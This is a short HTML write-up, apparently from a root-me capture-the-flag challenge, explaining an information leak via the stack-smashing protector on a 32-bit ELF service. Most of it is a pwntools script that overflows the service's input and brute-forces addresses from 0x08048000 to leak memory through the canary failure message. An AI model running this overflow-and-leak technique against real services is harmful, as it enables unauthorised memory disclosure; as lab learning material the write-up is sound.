<html>
 <head>
<title> Information leak with SSP </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> root-me </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> ELF32 information leakage with Stack Smashing protector </h1>
   
 <br> 

<p> There was no binary file given .. it was running in a port asking for password <br>
   By default ELF binaries are mapped at 0x08048000 <br>
  So, I tried to bruteforce the layout 0x08048fff-0x08048000 <br>
</p>

<code>
from pwn import *

for i in xrange(0x08048ffe, 0x08048000, -0x2):
    c = remote("challenge03.root-me.org",56529)
    c.recvuntil("service: ")
    c.send('A'*256 + 'B'*168 + p32(i))
    try:
        c.recvuntil("*** stack smashing detected ***:")
        print "[" + hex(i) + "]" + c.recvuntil("terminated")[:-10]
    except:
        #print "[-] crash"
        None

print "end ..."
</code>


<p>For Further references <a href="https://gist.github.com/tfairane/5fa403062d3bd73538a4"> LINK </a> </p>


</body>
</html>